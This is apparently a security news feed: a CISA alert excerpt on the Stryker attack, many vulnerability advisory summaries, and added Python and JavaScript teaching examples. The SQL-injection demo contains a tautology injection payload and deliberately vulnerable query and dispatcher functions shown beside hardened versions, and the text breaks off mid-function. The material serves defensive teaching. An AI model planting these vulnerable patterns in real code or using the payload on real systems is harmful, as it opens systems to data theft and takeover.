- For recommendations on securing Microsoft Intune, see Best practices for securing Microsoft Intune.
- For guidance on implementing Multi Admin Approval in Microsoft Intune, see Use Access policies to implement Multi Admin Approval.
- For recommendations on configuring Microsoft Intune using zero trust principles, see Configure Microsoft Intune for increased security.
- For guidance on implementing Microsoft Intune RBAC policies, see Role-based access control (RBAC) with Microsoft Intune.
- For guidance on deploying Privileged Identity Management (PIM) across Microsoft Intune, Entra ID, and other Microsoft software, see Plan a Privileged Identity Management deployment.

CISA resources:
- For guidance on implementing phishing-resistant multifactor authentication (MFA), see Implementing Phishing-Resistant MFA.

Disclaimer
The information in this report is being provided "as is" for informational purposes only. CISA does not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA.

Acknowledgements
Microsoft and Stryker contributed to this alert.

Notes
[1] For updates from Stryker on the incident, see "Customer Updates: Stryker Network Disruption," Stryker, last modified March 15, 2026, https://www.stryker.com/us/en/about/news/2026/a-message-to-our-customers-03-2026.html.
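The three hardening points above (least-privilege RBAC, narrow assignment scope, Multi Admin Approval on high-impact actions) are the kind of thing that drifts silently in a tenant, so they are worth checking mechanically. The script below is an added example written for this page, not Microsoft's or CISA's code and not an Intune API client: it audits an exported snapshot of role definitions, role assignments and approval policies and reports roles that can wipe, retire or delete devices while being assigned to every device or while no approval policy gates that action. The export shape is a constructed sample loosely modeled on Intune's roleDefinition and roleAssignment resources; the field names, the resource-action identifiers, the approval-policy types and the mapping between them are assumptions for the example, so adjust them to what your own Graph export actually contains.

```python
"""Audit an endpoint-management RBAC export for the gaps the alert calls out.

Added example, not Microsoft or CISA code. The export structure, the action
identifiers in HIGH_IMPACT and the approval-policy types are assumptions.
"""
import json
from typing import Dict, List, Set

# High-impact resource actions and the Multi Admin Approval policy type that
# should gate each one. Both the identifiers and the mapping are assumptions
# modeled on Intune's "Microsoft.Intune_<Resource>_<Action>" naming.
HIGH_IMPACT: Dict[str, str] = {
    "Microsoft.Intune_RemoteTasks_Wipe": "deviceActions",
    "Microsoft.Intune_RemoteTasks_Retire": "deviceActions",
    "Microsoft.Intune_ManagedDevices_Delete": "deviceActions",
    "Microsoft.Intune_MobileApps_Assign": "apps",
    "Microsoft.Intune_DeviceConfigurations_Assign": "deviceConfigurations",
    "Microsoft.Intune_Roles_Update": "roles",
}

# Constructed sample export: one over-privileged help-desk role assigned to
# all devices, one read-only role, one assignment whose role no longer exists,
# and an approval policy that only covers app changes.
SAMPLE_EXPORT = json.dumps({
    "roleDefinitions": [
        {"id": "r-helpdesk", "displayName": "Help Desk Operator",
         "rolePermissions": [{"resourceActions": [{"allowedResourceActions": [
             "Microsoft.Intune_ManagedDevices_Read",
             "Microsoft.Intune_RemoteTasks_Wipe"]}]}]},
        {"id": "r-auditor", "displayName": "Read Only Auditor",
         "rolePermissions": [{"resourceActions": [{"allowedResourceActions": [
             "Microsoft.Intune_ManagedDevices_Read"]}]}]},
    ],
    "roleAssignments": [
        {"id": "a1", "displayName": "Help Desk - everything",
         "roleDefinitionId": "r-helpdesk", "scopeType": "allDevices"},
        {"id": "a2", "displayName": "Auditors - EU scope tag",
         "roleDefinitionId": "r-auditor", "scopeType": "resourceScope"},
        {"id": "a3", "displayName": "Orphaned assignment",
         "roleDefinitionId": "r-deleted", "scopeType": "allDevices"},
    ],
    "approvalPolicies": [{"policyType": "apps"}],
})


def role_actions(role: dict) -> Set[str]:
    """Flatten the nested permission blocks of a role into one set of action ids."""
    actions: Set[str] = set()
    for perm in role.get("rolePermissions", []):
        for block in perm.get("resourceActions", []):
            actions.update(block.get("allowedResourceActions", []))
    return actions


def audit(export: dict) -> List[dict]:
    """Return one finding per (assignment, issue); an empty list means clean."""
    roles = {r["id"]: r for r in export.get("roleDefinitions", [])}
    approved = {p["policyType"] for p in export.get("approvalPolicies", [])}
    findings: List[dict] = []
    for asg in export.get("roleAssignments", []):
        role = roles.get(asg["roleDefinitionId"])
        if role is None:
            # An assignment pointing at a deleted role is hygiene debt: it hides
            # what was once granted and may be silently revived by a re-created id.
            findings.append({"assignment": asg["id"], "issue": "dangling-role",
                             "detail": asg["roleDefinitionId"]})
            continue
        risky = sorted(role_actions(role) & set(HIGH_IMPACT))
        if not risky:
            continue
        if asg.get("scopeType") == "allDevices":
            # Least privilege covers the scope too: a wipe right limited to one
            # scope tag is a very different blast radius from "every device".
            findings.append({"assignment": asg["id"], "issue": "high-impact-all-devices",
                             "detail": ",".join(risky)})
        for action in risky:
            if HIGH_IMPACT[action] not in approved:
                findings.append({"assignment": asg["id"], "issue": "no-multi-admin-approval",
                                 "detail": action})
    return findings


def audit_json(text: str) -> List[dict]:
    """Convenience wrapper: audit a JSON export given as a string."""
    return audit(json.loads(text))


if __name__ == "__main__":
    for f in audit_json(SAMPLE_EXPORT):
        print(f"{f['issue']:26} {f['assignment']:4} {f['detail']}")
```

Run against the sample, the audit flags the help-desk assignment twice (wipe rights over all devices, and no approval policy covering device actions) and the orphaned assignment once, while the read-only auditor passes. The useful property is that each finding maps directly to one of the alert's three controls, so the output doubles as a remediation list.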

0
Multiple Vulnerabilities in Google Chrome Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged on user. Depending on the privileges associated with the user an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

0
Winning CTFs: A Proving Ground at HackMex & Ekoparty

CTF competitions push offensive security skills to their limits. In 2025, the Bishop Fox Mexico team claimed first place at both HackMex Finals and EkoParty Red Team Space. Discover how the team navigated web exploitation, infrastructure compromise, and AWS attack paths to win.

0
Iran-Backed Hackers Claim Wiper Attack on Medtech Firm Stryker

A hacktivist group with links to Iran's intelligence agencies is claiming responsibility for a data-wiping attack against Stryker, a global medical technology company based in Michigan. News reports out of Ireland, Stryker's largest hub outside of the United States, said the company sent home more than 5,000 workers there today. Meanwhile, a voicemail message at Stryker's main U.S. headquarters says the company is currently experiencing a building emergency.

0
Multiple Vulnerabilities in Mozilla Firefox Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Mozilla Firefox, the most severe of which could allow for arbitrary code execution. Mozilla Firefox is a web browser used to access the Internet. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

0
Critical Patches Issued for Microsoft Products, March 10, 2026

Multiple vulnerabilities have been discovered in Microsoft products, the most severe of which could allow for remote code execution. Successful exploitation of the most severe of these vulnerabilities could result in an attacker gaining the same privileges as the logged-on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

0
Multiple Vulnerabilities in Adobe Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Adobe products, the most severe of which could allow for arbitrary code execution. Adobe Acrobat is a comprehensive software family designed to create, edit, manage, and sign PDF documents across desktop, web, and mobile devices. Adobe Commerce is a composable ecommerce solution that lets you quickly create global, multi-brand B2C and B2B experiences all from one cloud-native platform. Adobe DNG Software Development Kit (SDK) is a free set of tools and code that helps developers add support for Adobe's Digital Negative (DNG) universal RAW file format into their own applications and cameras. Adobe Experience Manager (AEM) is a comprehensive content management solution for building websites, mobile apps, and forms. Adobe Premiere Pro is a subscription-based timeline video editing software for film, TV, and web. Adobe Substance 3D is a suite of tools for creating 3D content, including modeling, texturing, and rendering. Adobe Illustrator is a software for creating vector-based graphics, such as logos, icons, illustrations, and typography. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

0
Pre-Authentication SQL Injection in FortiClient EMS 7.4.4 - CVE-2026-21643

FortiClient EMS 7.4.4 contains a pre-authentication SQL injection vulnerability (CVSS 9.1) in its multi-tenant site routing middleware. An unauthenticated attacker can inject arbitrary SQL by sending a crafted Site HTTP header to any pre-auth endpoint.
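The pattern described above, a tenant-routing lookup keyed on a request header that runs before any authentication, is worth seeing in miniature. The block below is an added example written for this page, not FortiClient EMS code and not the advisory's payload: it models a routing middleware over an in-memory SQLite table, with the vulnerable lookup (header concatenated into the query) beside the hardened one (header shape allowlisted, value bound as a parameter). Table, column and header names are assumptions and the tenant rows are constructed sample data; the tautology payload is the textbook one, not anything specific to the CVE.

```python
"""Pre-auth tenant routing on an untrusted header: vulnerable vs hardened.

Added example, not FortiClient EMS code. The schema, the sample tenants and
the header name are assumptions for the illustration.
"""
import re
import sqlite3
from typing import List, Optional, Tuple

Row = Tuple[str, str]


def make_db() -> sqlite3.Connection:
    """Constructed in-memory tenant table standing in for the routing store."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE sites (name TEXT PRIMARY KEY, schema_name TEXT NOT NULL)"
    )
    conn.executemany(
        "INSERT INTO sites (name, schema_name) VALUES (?, ?)",
        [("default", "tenant_default"), ("acme", "tenant_acme")],
    )
    return conn


def route_site_vulnerable(conn: sqlite3.Connection, site_header: str) -> List[Row]:
    """The sink: the raw header value is spliced into the query text.

    Because tenant routing runs before authentication, any anonymous client
    that can reach a pre-auth endpoint can reach this statement.
    """
    sql = f"SELECT name, schema_name FROM sites WHERE name = '{site_header}'"
    return conn.execute(sql).fetchall()


# Tenant identifiers are DNS-label-like; anything else is rejected outright.
SITE_NAME = re.compile(r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?")


def route_site_hardened(conn: sqlite3.Connection, site_header: Optional[str]) -> List[Row]:
    """Allowlist the header's shape, then let the driver bind it as data.

    Parameter binding alone closes the injection; the shape check on top
    gives a cheap, loggable signal that someone is probing the routing layer.
    """
    name = site_header if site_header is not None else "default"
    if not SITE_NAME.fullmatch(name):
        # Fail closed: no tenant, no routing, nothing to query. A real service
        # would also log the source address and the rejected raw value here.
        return []
    return conn.execute(
        "SELECT name, schema_name FROM sites WHERE name = ?", (name,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "nosuchsite' OR '1'='1"  # textbook tautology, not a CVE-specific payload
    print("vulnerable:", route_site_vulnerable(db, payload))  # every tenant row comes back
    print("hardened:  ", route_site_hardened(db, payload))    # []
    print("hardened:  ", route_site_hardened(db, "acme"))     # [('acme', 'tenant_acme')]
```

The vulnerable lookup returns every tenant for the tautology payload, which is the behaviour that lets an attacker enumerate or redirect tenant routing without a session; the hardened lookup returns nothing for it and still resolves a well-formed tenant name. When hunting for this class in your own code, grep for any request-derived value (headers included, not just query parameters and bodies) that reaches a query before the authentication middleware runs.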

0
How AI Assistants are Moving the Security Goalposts

AI-based assistants or "agents" -- autonomous programs that have access to the user's computer, files, online services and can automate virtually any task -- are growing in popularity with developers and IT workers. But as so many eyebrow-raising headlines over the past few weeks have shown, these powerful and assertive new tools are rapidly shifting the security priorities for organizations, while blurring the lines between data and code, trusted co-worker and insider threat, ninja hacker and novice code jockey.

0
A Vulnerability in pac4j-jwt (JwtAuthenticator) Could Allow for Authentication Bypass

A vulnerability has been discovered in pac4j-jwt (JwtAuthenticator) which could allow for authentication bypass. pac4j-jwt is a Java module within the pac4j security framework designed for generating, validating, and managing JSON Web Tokens (JWT) to secure web applications and services. It supports signed and encrypted tokens, primarily using the Nimbus JOSE+JWT library to handle authentication, profile generation, and signature configuration. Successful exploitation of this vulnerability could allow an unauthenticated, remote attacker to bypass authentication and authenticate as any user (including administrator), with any role, without knowing a single secret.

0
Multiple Vulnerabilities in Cisco Products Could Allow for Remote Code Execution

Multiple vulnerabilities have been discovered in Cisco products, the most severe of which could allow for remote code execution.  Cisco Secure Firewall Management Center (FMC) is a centralized management platform for Cisco firewalls. Cisco Secure Firewall Adaptive Security Appliance (ASA) Software is the core operating system that powers the Cisco ASA family of firewalls. Cisco Secure Firewall Threat Defense (FTD) is a unified software image for Cisco Firepower appliances that combines ASA firewall functionality with Snort IPS, URL filtering, and advanced malware protection (AMP). Successful exploitation of the most severe of these vulnerabilities could allow for remote code execution as root, which may lead to the complete compromise of the affected device.

0
Multiple Vulnerabilities in Google Android OS Could Allow for Remote Code Execution

Multiple vulnerabilities have been discovered in Google Android OS, the most severe of which could allow for remote code execution. Android is an operating system developed by Google for mobile devices, including, but not limited to, smartphones, tablets, and watches. Successful exploitation of the most severe of these vulnerabilities could allow for remote code execution. Depending on the privileges associated with the exploited component, an attacker could then install programs; view, change, or delete data; or create new accounts with full rights.

0
Beyond Electron: Attacking Alternative Desktop Application Frameworks

Tauri promises a lighter, security-first future beyond Electron—but does it actually reduce risk? Carlos Yanez uncovers how XSS and permissive configs can still be chained into RCE, walking through real-world exploitation techniques every appsec team should understand.

0
Who is the Kimwolf Botmaster “Dort”?

In early January 2026, KrebsOnSecurity revealed how a security researcher disclosed a vulnerability that was used to assemble Kimwolf, the world's largest and most disruptive botnet. Since then, the person in control of Kimwolf -- who goes by the handle "Dort" -- has coordinated a barrage of distributed denial-of-service (DDoS), doxing and email flooding attacks against the researcher and this author, and more recently caused a SWAT team to be sent to the researcher's home. This post examines what is knowable about Dort based on public information.

0
Introducing CloudFox GCP: Attack Path Identification for Google Cloud

Meet CloudFox GCP, an offensive security tool built to map identities, enumerate resources, and uncover real attack paths in Google Cloud. Designed for practitioners, it exposes privilege escalation, lateral movement, and data exfiltration risks so you can secure GCP before attackers exploit it.

0
Multiple Vulnerabilities in Cisco Catalyst SD-WAN Products Could Allow for Authentication Bypass

Multiple vulnerabilities have been discovered in Cisco Catalyst SD-WAN products, the most severe of which could allow for authentication bypass. Cisco Catalyst SD-WAN (formerly Viptela) is a secure, cloud-delivered software-defined WAN architecture that optimizes application performance by intelligently routing traffic over any combination of transport links (MPLS, broadband, LTE). Successful exploitation of the most severe of these vulnerabilities could allow an unauthenticated, remote attacker to bypass authentication and obtain administrative privileges on an affected system.

0
Samsung Tizen OS | Version Through 9.0

Bishop Fox identified a low-risk command injection flaw in Samsung Tizen OS (through 9.0) that allows OS-level code execution on smart TVs with developer mode enabled. Exploitation requires local access and the configured developer IP. Organizations should disable developer mode or use kiosk mode.

0
A Vulnerability in Dell RecoverPoint for Virtual Machines Could Allow for Arbitrary Code Execution

A vulnerability has been discovered in Dell RecoverPoint for Virtual Machines which could allow for arbitrary code execution. Dell RecoverPoint for Virtual Machines is an enterprise-grade solution for VMware Virtual Machines (VMs) enabling local, remote, and concurrent local and remote replication, with continuous cyber resilience for on-premises recovery to any point in time (PiT). Successful exploitation of the vulnerability could allow for arbitrary code execution in the context of the logged-on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

0
A Vulnerability in Google Chrome Could Allow for Arbitrary Code Execution

A vulnerability has been discovered in Google Chrome which could allow for arbitrary code execution. Successful exploitation of the vulnerability could allow for arbitrary code execution in the context of the logged on user. Depending on the privileges associated with the user an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

0
Patch Tuesday, February 2026 Edition

Microsoft today released updates to fix more than 50 security holes in its Windows operating systems and other software, including patches for a whopping six "zero-day" vulnerabilities that attackers are already exploiting in the wild.

0
Multiple Vulnerabilities in Ivanti Endpoint Manager Could Allow for Authentication Bypass

Multiple vulnerabilities have been discovered in Ivanti Endpoint Manager, the most severe of which could allow for authentication bypass. Ivanti Endpoint Manager is a client-based unified endpoint management software. Successful exploitation of the most severe of these vulnerabilities could allow a remote, unauthenticated attacker to leak specific stored credential data.

0
Multiple Vulnerabilities in Fortinet Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Fortinet products, the most severe of which could allow for arbitrary code execution. FortiAuthenticator is a centralized identity and access management (IAM) solution that secures network access by managing user identities, Multi-Factor Authentication (MFA), and certificate management. FortiClientEMS is a centralized management platform for deploying, configuring, monitoring, and enforcing security policies across numerous endpoints (computers) running the FortiClient agent. FortiClient is a Fabric Agent that delivers protection, compliance, and secure access in a single, modular lightweight client. FortiOS is Fortinet's proprietary operating system, used across multiple product lines. FortiSandbox is an advanced threat detection solution from Fortinet that uses sandboxing to analyze suspicious files and network traffic for advanced threats like zero-day malware and ransomware. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the affected service account. Depending on the privileges associated with the service account, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Service accounts that are configured to have fewer user rights on the system could be less impacted than those that operate with administrative user rights.

0
Critical Patches Issued for Microsoft Products, February 10, 2026

Multiple vulnerabilities have been discovered in Microsoft products, the most severe of which could allow for remote code execution. Successful exploitation of the most severe of these vulnerabilities could result in an attacker gaining the same privileges as the logged-on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

0
Multiple Vulnerabilities in Adobe Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Adobe products, the most severe of which could allow for arbitrary code execution. Adobe After Effects is a digital effects, motion graphics, and compositing application. Adobe Audition is a comprehensive toolset that includes multitrack, waveform, and spectral display for creating, mixing, editing, and restoring audio content. Adobe Bridge is a creative asset manager that lets you preview, organize, edit, and publish multiple creative assets quickly and easily. Adobe DNG Software Development Kit (SDK) is a free set of tools and code that helps developers add support for Adobe's Digital Negative (DNG) universal RAW file format into their own applications and cameras. Adobe InDesign is a professional page layout and desktop publishing software used for designing and publishing content for both print and digital media. Adobe Lightroom is a cloud-based photo editing and management software designed for photographers to organize, edit, store, and share images across desktop, mobile, and web. Adobe Substance 3D is a suite of tools for creating 3D content, including modeling, texturing, and rendering. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

0
Deep Dive into Arista NG Firewall Vulnerabilities

Bishop Fox identified six vulnerabilities in Arista NG Firewall version 17.4, including critical command injection flaws allowing root-level code execution with some exploitable by chaining attacks through a single malicious link.

0
Please Don’t Feed the Scattered Lapsus ShinyHunters

A prolific data ransom gang that calls itself Scattered Lapsus ShinyHunters (SLSH) has a distinctive playbook when it seeks to extort payment from victim firms: Harassing, threatening and even swatting executives and their families, all while notifying journalists and regulators…

0
Multiple Vulnerabilities in Ivanti Endpoint Manager Mobile Could Allow for Remote Code Execution

Multiple vulnerabilities have been discovered in Ivanti Endpoint Manager Mobile which could allow for remote code execution. Ivanti Endpoint Manager Mobile is a mobile management software engine that enables IT to set policies for mobile devices, applications and content. Successful exploitation of these vulnerabilities could allow for remote code execution in the context of the user. Depending on the privileges associated with the user an attacker could then install programs; view, change, or delete data; make configuration changes on devices; or create new accounts with full user rights.

0
Multiple Vulnerabilities in SolarWinds Web Help Desk Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in SolarWinds Web Help Desk, the most severe of which could allow for arbitrary code execution. SolarWinds Web Help Desk (WHD) is a web-based software that provides IT help desk and asset management functionality, allowing IT teams to manage service requests, track IT assets, and offer self-service options to end-users. Successful exploitation of the most severe of these vulnerabilities could allow an actor to execute code in the context of SYSTEM. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

0
A Vulnerability in Microsoft Office Could Allow for Security Feature Bypass

A vulnerability has been discovered in Microsoft Office which could allow for a security feature bypass. Microsoft Office is a suite of applications designed to help with productivity and completing common tasks on a computer. You can create and edit documents containing text and images, work with data in spreadsheets and databases, and create presentations and posters. Successful exploitation of the flaw relies on an attacker sending a specially crafted Office file and convincing recipients to open it. Microsoft notes that the Preview Pane is not an attack vector.

0
A Vulnerability in Cisco Unified Communications Products Could Allow for Remote Code Execution

A vulnerability has been discovered in Cisco Unified Communications Products which could allow for remote code execution. Cisco Unified Communications (UC) Products are an integrated suite of IP-based hardware and software that combine voice, video, messaging, and data into a single platform. Successful exploitation of this vulnerability could allow for remote code execution as root, which may lead to the complete compromise of the affected device.

0
Multiple Vulnerabilities in Adobe Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Adobe products, the most severe of which could allow for arbitrary code execution. Adobe Bridge is a creative asset manager that lets you preview, organize, edit, and publish multiple creative assets quickly and easily. Adobe Dreamweaver is a web design integrated development environment (IDE) that is used to develop and design websites. Adobe InDesign is a professional page layout and desktop publishing software used for designing and publishing content for both print and digital media. Adobe InCopy is a professional word processor designed for writers and editors to collaborate with designers on documents simultaneously. Adobe Photoshop is a powerful raster graphics editor developed by Adobe for image creation, editing, and manipulation. Adobe Illustrator is a professional vector graphics editor used for creating logos, icons, typography, and other scalable graphics that retain clarity at any size. Adobe Substance 3D is a suite of tools for creating 3D content, including modeling, texturing, and rendering. Adobe ColdFusion is a rapid development platform for building and deploying web and mobile applications. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

0
Multiple Vulnerabilities in Google Chrome Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged on user. Depending on the privileges associated with the user an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

0
Multiple Vulnerabilities in Fortinet Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Fortinet products, the most severe of which could allow for arbitrary code execution. FortiSandbox is an advanced threat detection solution from Fortinet that uses sandboxing to analyze suspicious files and network traffic for advanced threats like zero-day malware and ransomware. FortiWeb is a web application firewall (WAF) that protects web applications and APIs from cyberattacks like SQL injection and cross-site scripting, while also helping to meet compliance requirements. FortiVoice is a unified communications solution that combines voice, chat, conferencing, and fax into a single, secure platform for businesses and schools. FortiOS is Fortinet's proprietary operating system, used across multiple product lines. FortiProxy is a secure web gateway product from Fortinet that protects users from internet-borne attacks, enforces compliance, and improves network performance. FortiClientEMS is a centralized management platform for deploying, configuring, monitoring, and enforcing security policies across numerous endpoints (computers) running the FortiClient agent. FortiSwitchManager is Fortinet's dedicated, on-premise platform for centrally managing FortiSwitch devices in large deployments. FortiFone is Fortinet's secure, enterprise-grade unified communications solution. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the affected service account. Depending on the privileges associated with the service account, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Service accounts that are configured to have fewer user rights on the system could be less impacted than those that operate with administrative user rights.

0
Critical Patches Issued for Microsoft Products, January 13, 2026

Multiple vulnerabilities have been discovered in Microsoft products, the most severe of which could allow for remote code execution. Successful exploitation of the most severe of these vulnerabilities could result in an attacker gaining the same privileges as the logged-on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

0
Multiple Vulnerabilities in Mozilla Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Mozilla products, the most severe of which could allow for arbitrary code execution.  Mozilla Firefox is a web browser used to access the Internet. Mozilla Firefox ESR is a version of the web browser intended to be deployed in large organizations. Mozilla Thunderbird is an email client. Mozilla Thunderbird ESR is a version of the email client intended to be deployed in large organizations. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

0
A Vulnerability in WatchGuard Fireware OS Could Allow for Arbitrary Code Execution

A vulnerability has been discovered in WatchGuard Fireware OS, which could allow for unauthenticated arbitrary code execution. WatchGuard Fireware is the proprietary operating system that powers WatchGuard's Firebox appliances. Successful exploitation of this vulnerability could allow a remote unauthenticated attacker to execute arbitrary code on the system.

0
A Vulnerability in Cisco AsyncOS Could Allow for Remote Code Execution

A vulnerability has been discovered in Cisco AsyncOS, which could allow for remote code execution. AsyncOS is the operating system used by Cisco Secure Email Gateway and Cisco Secure Email and Web Manager. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands with root-level privileges on the underlying operating system.

0
MITRE AADAPT Framework as a Red Team Roadmap

MITRE’s AADAPT framework exposes how attackers target digital-asset systems but the real value comes from testing those threats. Learn how red teaming turns AADAPT into evidence-driven detection, stronger controls, and measurable protection against economic loss.

0
Multiple Vulnerabilities in Apple Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Apple products, the most severe of which could allow for arbitrary code execution. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

0
Multiple Vulnerabilities in Google Chrome Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged on user. Depending on the privileges associated with the user an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

0
A Hacker Holiday Gift Guide: 2025 Edition

Shopping for a hacker? Skip the gimmicks. Here are the tools, training, and books they actually want: Flipper Zero, Proxmark3, Shodan, HTB, and must-read vuln research picks, perfect for deal-season lab upgrades.

Multiple Vulnerabilities in Adobe Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Adobe products, the most severe of which could allow for arbitrary code execution. Adobe ColdFusion is a rapid web application development platform that uses the ColdFusion Markup Language (CFML). Adobe Experience Manager (AEM) is a content and experience management system that helps businesses build and manage their digital presence across platforms. The Adobe DNG Software Development Kit (SDK) is a free set of tools and code that lets developers add support for Adobe's Digital Negative (DNG) RAW file format to their own applications and cameras, so they can read, write, and process DNG images. Adobe Acrobat is a suite of paid tools for creating, editing, converting, and managing PDF documents. The Adobe Creative Cloud desktop app is the central hub for managing Adobe creative applications, files, and assets. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution in the context of the logged-on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Critical Patches Issued for Microsoft Products, December 9, 2025

Multiple vulnerabilities have been discovered in Microsoft products, the most severe of which could allow for remote code execution. Successful exploitation of the most severe of these vulnerabilities could result in an attacker gaining the same privileges as the logged-on user. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Multiple Vulnerabilities in Mozilla Products Could Allow for Arbitrary Code Execution

Multiple vulnerabilities have been discovered in Mozilla products, the most severe of which could allow for arbitrary code execution. Mozilla Firefox is a web browser used to access the Internet. Mozilla Firefox ESR is a version of the web browser intended to be deployed in large organizations. Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

A Vulnerability in React Server Components (RSC) Could Allow for Remote Code Execution

A vulnerability in the React Server Components (RSC) implementation has been discovered that could allow for remote code execution. Specifically, it could allow for unauthenticated remote code execution on affected servers. The issue stems from unsafe deserialization of RSC “Flight” protocol payloads, enabling an attacker to send a crafted request that triggers execution of code on the server. Security researchers are now calling this “React2Shell”.
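The bug class behind that advisory, as an added illustration (this is not React's Flight implementation and not a reproduction of React2Shell; the module names, action IDs and request bodies are hypothetical and constructed here): a dispatcher that resolves code references taken straight from the request body, beside a hardened one that only accepts opaque, allow-listed action IDs.

```javascript
// Added illustration, NOT React's Flight code: a toy action dispatcher that
// resolves a client-supplied reference to server-side code. Module names,
// action IDs and payloads below are constructed for this example.

// Hypothetical modules the application intends to expose to clients.
const publicModules = {
  'actions/greet': { greet: (name) => `hello ${name}` },
  'actions/total': { total: (a, b) => a + b },
};

// Hypothetical internal module that must never be reachable from a request.
const internalModules = {
  'internal/shell': { runCommand: (cmd) => `executed: ${cmd}` },
};

// Stand-in for unrestricted reference resolution (think require() of an
// identifier lifted from the request body).
function resolveAny(id) {
  return publicModules[id] || internalModules[id];
}

// VULNERABLE: the request chooses the module, the export and the arguments.
// Anything resolveAny() can reach becomes callable, so deserializing a
// crafted payload turns into arbitrary server-side code execution.
function vulnerableDispatch(payload) {
  const { moduleId, exportName, args } = JSON.parse(payload);
  const target = resolveAny(moduleId)[exportName];
  return target(...args);
}

// HARDENED: the client sends only an opaque action ID. The server maps it to
// a function through an allow-list fixed at build time, checks the argument
// shape, and never resolves names that arrived over the wire.
const allowedActions = new Map([
  ['act_greet', { fn: publicModules['actions/greet'].greet, arity: 1 }],
  ['act_total', { fn: publicModules['actions/total'].total, arity: 2 }],
]);

function safeDispatch(payload) {
  let parsed;
  try {
    parsed = JSON.parse(payload);
  } catch (e) {
    throw new Error('malformed payload');
  }
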